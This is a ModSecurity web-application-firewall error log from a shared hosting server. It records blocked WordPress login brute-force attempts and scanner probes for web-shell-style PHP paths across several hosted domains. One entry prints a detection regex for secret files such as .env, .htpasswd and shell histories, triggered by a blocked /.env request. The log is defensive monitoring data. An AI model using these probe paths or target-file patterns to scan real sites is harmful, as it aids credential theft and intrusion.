[Tue May 26 19:33:02.486456 2026] [security2:error] [pid 58470:tid 58607] [client 57.141.2.61:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoFrnjVHRH3AGGvmYIrAAAAAc"]
[Tue May 26 19:33:02.963943 2026] [security2:error] [pid 58470:tid 58676] [client 173.239.240.53:43725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 53.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahWoFrnjVHRH3AGGvmYIxQAAAEw"]
[Tue May 26 19:33:03.068711 2026] [security2:error] [pid 58470:tid 58639] [client 173.239.240.58:58265] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 58.240.239.173.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ntgpnk.in"] [uri "/wp-login.php"] [unique_id "ahWoFrnjVHRH3AGGvmYIxwAAACc"]
[Tue May 26 19:33:03.598130 2026] [security2:error] [pid 58470:tid 58585] [remote 45.130.18.144:56412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 144.18.130.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoF7njVHRH3AGGvmYI2AAAH3I"]
[Tue May 26 19:33:03.874399 2026] [security2:error] [pid 58470:tid 58638] [client 89.163.146.197:60990] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 197.146.163.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/txets.php"] [unique_id "ahWoF7njVHRH3AGGvmYI6AAAACY"], referer: www.google.com
[Tue May 26 19:33:03.876975 2026] [security2:error] [pid 58470:tid 58562] [remote 45.130.18.144:56412] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 144.18.130.45.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoF7njVHRH3AGGvmYI6QAANFs"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:33:04.019585 2026] [security2:error] [pid 58470:tid 58723] [client 57.141.2.12:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoF7njVHRH3AGGvmYI5AAAAHs"]
[Tue May 26 19:33:04.280360 2026] [security2:error] [pid 58470:tid 58662] [client 40.83.92.30:5957] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWoGLnjVHRH3AGGvmYI9AAAAD4"]
[Tue May 26 19:33:04.280516 2026] [security2:error] [pid 58470:tid 58662] [client 40.83.92.30:5957] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/wp-content/plugins/hellopress/wp_filemanager.php"] [unique_id "ahWoGLnjVHRH3AGGvmYI9AAAAD4"]
[Tue May 26 19:33:06.358641 2026] [core:error] [pid 58470:tid 58619] (104)Connection reset by peer: [client 45.154.98.236:51267] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 19:33:06.602057 2026] [security2:error] [pid 58470:tid 58652] [client 89.163.146.197:51839] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 197.146.163.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/txets.php"] [unique_id "ahWoGrnjVHRH3AGGvmYJOwAAADQ"], referer: www.google.com
[Tue May 26 19:33:06.856601 2026] [security2:error] [pid 58470:tid 58725] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoGrnjVHRH3AGGvmYJOAAAAH0"]
[Tue May 26 19:33:07.528561 2026] [security2:error] [pid 58470:tid 58679] [client 40.83.92.30:5964] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/admin.php"] [unique_id "ahWoG7njVHRH3AGGvmYJWAAAAE8"]
[Tue May 26 19:33:07.528668 2026] [security2:error] [pid 58470:tid 58679] [client 40.83.92.30:5964] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/admin.php"] [unique_id "ahWoG7njVHRH3AGGvmYJWAAAAE8"]
[Tue May 26 19:33:07.706667 2026] [security2:error] [pid 58470:tid 58577] [remote 121.200.216.55:48734] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 55.216.200.121.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoG7njVHRH3AGGvmYJVwAAeGo"]
[Tue May 26 19:33:08.460957 2026] [security2:error] [pid 58470:tid 58701] [client 89.163.146.197:64665] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 197.146.163.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp-content/txets.php"] [unique_id "ahWoHLnjVHRH3AGGvmYJcAAAAGU"], referer: www.google.com
[Tue May 26 19:33:09.304893 2026] [security2:error] [pid 58470:tid 58693] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoHLnjVHRH3AGGvmYJhwAAAF0"]
[Tue May 26 19:33:10.107500 2026] [security2:error] [pid 58470:tid 58698] [client 89.163.146.197:55029] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 197.146.163.89.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "bhavisharchitects.com"] [uri "/wp-content/txets.php"] [unique_id "ahWoHrnjVHRH3AGGvmYJogAAAGI"], referer: www.google.com
[Tue May 26 19:33:10.417396 2026] [security2:error] [pid 58470:tid 58706] [client 40.83.92.30:5314] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/inputs.php"] [unique_id "ahWoHrnjVHRH3AGGvmYJpwAAAGo"]
[Tue May 26 19:33:10.417506 2026] [security2:error] [pid 58470:tid 58706] [client 40.83.92.30:5314] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/inputs.php"] [unique_id "ahWoHrnjVHRH3AGGvmYJpwAAAGo"]
[Tue May 26 19:33:10.427064 2026] [security2:error] [pid 58470:tid 58661] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoHbnjVHRH3AGGvmYJoQAAAD0"]
[Tue May 26 19:33:11.727273 2026] [security2:error] [pid 58470:tid 58668] [client 40.83.92.30:5348] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/file.php"] [unique_id "ahWoH7njVHRH3AGGvmYJwwAAAEQ"]
[Tue May 26 19:33:11.727383 2026] [security2:error] [pid 58470:tid 58668] [client 40.83.92.30:5348] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/file.php"] [unique_id "ahWoH7njVHRH3AGGvmYJwwAAAEQ"]
[Tue May 26 19:33:12.009760 2026] [core:error] [pid 58470:tid 58717] (104)Connection reset by peer: [client 45.154.98.236:64390] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 19:33:12.656751 2026] [security2:error] [pid 58470:tid 58666] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoILnjVHRH3AGGvmYJ1QAAAEI"]
[Tue May 26 19:33:14.001304 2026] [security2:error] [pid 58470:tid 58586] [remote 103.91.67.202:54626] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 202.67.91.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoIbnjVHRH3AGGvmYKAAAAA3M"]
[Tue May 26 19:33:14.096307 2026] [security2:error] [pid 58470:tid 58614] [client 40.83.92.30:5323] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/ms-edit.php"] [unique_id "ahWoIrnjVHRH3AGGvmYKDQAAAA4"]
[Tue May 26 19:33:14.096410 2026] [security2:error] [pid 58470:tid 58614] [client 40.83.92.30:5323] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/ms-edit.php"] [unique_id "ahWoIrnjVHRH3AGGvmYKDQAAAA4"]
[Tue May 26 19:33:15.652227 2026] [security2:error] [pid 58470:tid 58699] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoI7njVHRH3AGGvmYKNAAAAGM"]
[Tue May 26 19:33:16.871694 2026] [security2:error] [pid 58470:tid 58698] [client 40.83.92.30:5955] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/simple.php"] [unique_id "ahWoJLnjVHRH3AGGvmYKVAAAAGI"]
[Tue May 26 19:33:16.871817 2026] [security2:error] [pid 58470:tid 58698] [client 40.83.92.30:5955] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/simple.php"] [unique_id "ahWoJLnjVHRH3AGGvmYKVAAAAGI"]
[Tue May 26 19:33:17.556322 2026] [core:error] [pid 58470:tid 58700] (104)Connection reset by peer: [client 45.154.98.236:53647] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 19:33:17.736634 2026] [security2:error] [pid 58470:tid 58663] [client 57.141.2.15:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoJbnjVHRH3AGGvmYKZQAAAD8"]
[Tue May 26 19:33:18.059436 2026] [security2:error] [pid 58470:tid 58607] [client 40.83.92.30:5346] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahWoJrnjVHRH3AGGvmYKegAAAAc"]
[Tue May 26 19:33:18.059580 2026] [security2:error] [pid 58470:tid 58607] [client 40.83.92.30:5346] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/wp-content/plugins/twenty/login.php"] [unique_id "ahWoJrnjVHRH3AGGvmYKegAAAAc"]
[Tue May 26 19:33:19.229420 2026] [security2:error] [pid 58470:tid 58698] [client 57.141.2.70:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoJrnjVHRH3AGGvmYKkAAAAGI"]
[Tue May 26 19:33:19.908749 2026] [security2:error] [pid 58470:tid 58665] [client 40.83.92.30:5971] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/404.php"] [unique_id "ahWoJ7njVHRH3AGGvmYKtQAAAEE"]
[Tue May 26 19:33:19.908878 2026] [security2:error] [pid 58470:tid 58665] [client 40.83.92.30:5971] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/404.php"] [unique_id "ahWoJ7njVHRH3AGGvmYKtQAAAEE"]
[Tue May 26 19:33:20.593840 2026] [security2:error] [pid 58470:tid 58726] [client 202.76.183.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoKLnjVHRH3AGGvmYKuwAAAH4"]
[Tue May 26 19:33:22.138905 2026] [security2:error] [pid 58470:tid 58688] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoKbnjVHRH3AGGvmYK7AAAAFg"]
[Tue May 26 19:33:22.156848 2026] [security2:error] [pid 58470:tid 58658] [client 40.83.92.30:5965] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/file3.php"] [unique_id "ahWoKrnjVHRH3AGGvmYLAgAAADo"]
[Tue May 26 19:33:22.156933 2026] [security2:error] [pid 58470:tid 58658] [client 40.83.92.30:5965] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/file3.php"] [unique_id "ahWoKrnjVHRH3AGGvmYLAgAAADo"]
[Tue May 26 19:33:23.055380 2026] [core:error] [pid 58470:tid 58706] (104)Connection reset by peer: [client 45.154.98.236:49244] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 19:33:24.028091 2026] [security2:error] [pid 58470:tid 58713] [client 57.141.2.34:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoK7njVHRH3AGGvmYLLwAAAHE"]
[Tue May 26 19:33:24.504089 2026] [security2:error] [pid 58470:tid 58622] [client 40.83.92.30:5363] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/wp-mail.php"] [unique_id "ahWoLLnjVHRH3AGGvmYLTwAAABY"]
[Tue May 26 19:33:24.504215 2026] [security2:error] [pid 58470:tid 58622] [client 40.83.92.30:5363] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/wp-mail.php"] [unique_id "ahWoLLnjVHRH3AGGvmYLTwAAABY"]
[Tue May 26 19:33:25.640202 2026] [security2:error] [pid 58470:tid 58523] [remote 216.251.35.203:29736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.35.251.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoLbnjVHRH3AGGvmYLaAAAXDQ"]
[Tue May 26 19:33:26.711702 2026] [security2:error] [pid 58470:tid 58622] [client 40.83.92.30:5970] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/about.php"] [unique_id "ahWoLrnjVHRH3AGGvmYLigAAABY"]
[Tue May 26 19:33:26.711889 2026] [security2:error] [pid 58470:tid 58622] [client 40.83.92.30:5970] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/about.php"] [unique_id "ahWoLrnjVHRH3AGGvmYLigAAABY"]
[Tue May 26 19:33:26.861349 2026] [security2:error] [pid 58470:tid 58609] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoLrnjVHRH3AGGvmYLgQAAAAk"]
[Tue May 26 19:33:27.162310 2026] [security2:error] [pid 58470:tid 58704] [client 98.158.235.226:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWoL7njVHRH3AGGvmYLlwAAAGg"], referer: https://www.anujtradingco.com/
[Tue May 26 19:33:28.229473 2026] [security2:error] [pid 58470:tid 58625] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoL7njVHRH3AGGvmYLrgAAABk"]
[Tue May 26 19:33:28.289818 2026] [security2:error] [pid 58470:tid 58532] [remote 216.251.35.203:29736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 203.35.251.216.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWoMLnjVHRH3AGGvmYLuwAAND0"], referer: https://freshmindsolutions.com/wp-login.php
[Tue May 26 19:33:28.611770 2026] [core:error] [pid 58470:tid 58725] (104)Connection reset by peer: [client 45.154.98.236:63710] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 19:33:29.124718 2026] [security2:error] [pid 58470:tid 58552] [remote 216.73.216.30:49406] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWoMbnjVHRH3AGGvmYL3QAAKFE"]
[Tue May 26 19:33:29.362645 2026] [security2:error] [pid 58470:tid 58646] [client 40.83.92.30:5318] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/wp.php"] [unique_id "ahWoMbnjVHRH3AGGvmYL4AAAAC4"]
[Tue May 26 19:33:29.362757 2026] [security2:error] [pid 58470:tid 58646] [client 40.83.92.30:5318] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/wp.php"] [unique_id "ahWoMbnjVHRH3AGGvmYL4AAAAC4"]
[Tue May 26 19:33:30.926150 2026] [security2:error] [pid 58470:tid 58662] [client 40.83.92.30:5328] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/.dj/index.php"] [unique_id "ahWoMrnjVHRH3AGGvmYMEQAAAD4"]
[Tue May 26 19:33:30.926290 2026] [security2:error] [pid 58470:tid 58662] [client 40.83.92.30:5328] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/.dj/index.php"] [unique_id "ahWoMrnjVHRH3AGGvmYMEQAAAD4"]
[Tue May 26 19:33:31.193152 2026] [security2:error] [pid 58470:tid 58637] [client 176.65.139.238:30640] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "iiachennai.in.svijaykumar.in"] [uri "/.env"] [unique_id "ahWoM7njVHRH3AGGvmYMFgAAACU"]
[Tue May 26 19:33:31.285763 2026] [security2:error] [pid 58470:tid 58709] [client 57.141.2.51:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoMrnjVHRH3AGGvmYMEAAAAG0"]
[Tue May 26 19:33:33.114617 2026] [security2:error] [pid 58470:tid 58640] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWoNLnjVHRH3AGGvmYMPwAAACg"]
[Tue May 26 19:33:33.839051 2026] [security2:error] [pid 58470:tid 58668] [client 40.83.92.30:5359] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/adminfuns.php"] [unique_id "ahWoNbnjVHRH3AGGvmYMYwAAAEQ"]
[Tue May 26 19:33:33.839249 2026] [security2:error] [pid 58470:tid 58668] [client 40.83.92.30:5359] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/adminfuns.php"] [unique_id "ahWoNbnjVHRH3AGGvmYMYwAAAEQ"]
[Tue May 26 19:33:34.070894 2026] [core:error] [pid 58470:tid 58703] (104)Connection reset by peer: [client 45.154.98.236:54363] AH00574: ap_content_length_filter: apr_bucket_read() failed, referer: www.google.com
[Tue May 26 19:33:34.512972 2026] [security2:error] [pid 58470:tid 58669] [client 40.83.92.30:5959] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.92.83.40.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "aastha-enterprises.com"] [uri "/php8.php"] [unique_id "ahWoNrnjVHRH3AGGvmYMdgAAAEU"]
[Tue May 26 19:33:34.513102 2026] [security2:error] [pid 58470:tid 58669] [client 40.83.92.30:5959] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "aastha-enterprises.com"] [uri "/php8.php"] [unique_id "ahWoNrnjVHRH3AGGvmYMdgAAAEU"]
